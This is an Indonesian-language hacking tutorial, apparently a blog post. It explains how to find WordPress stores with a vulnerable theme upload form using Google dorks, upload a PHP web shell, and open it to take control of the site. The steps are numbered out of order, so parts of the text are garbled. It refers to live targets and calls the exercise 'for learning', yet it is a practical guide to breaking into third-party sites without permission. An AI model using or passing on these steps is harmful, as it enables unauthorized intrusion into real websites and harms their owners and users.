inurl:ptype=store
inurl:ptype=store site:(domain negara, misal : my)
2. Akan muncul beberapa web dari hasil penelusuran google, pilih satu untuk dites.
3. Exploit /wp-content/themes/framework/upload/
contoh : http://www.site.com/wp-content/themes/framework/upload/
4. Kalo vuln muncul form upload nya
Jika tidak muncul form upload , anda harus cari target lain
8. Jika loading upload selesai, anda buka shell anda dgn format :
http://www.site.com/wp-content/uploads/products_img/namashell.php
6. Selesai, muncullah shell anda. Anda eksekusi deh webnya.
Semoga berhasil ^_^
Live Target :
Mohon Live targetnya jangan di tebas :) untuk belajar
EmoticonEmoticon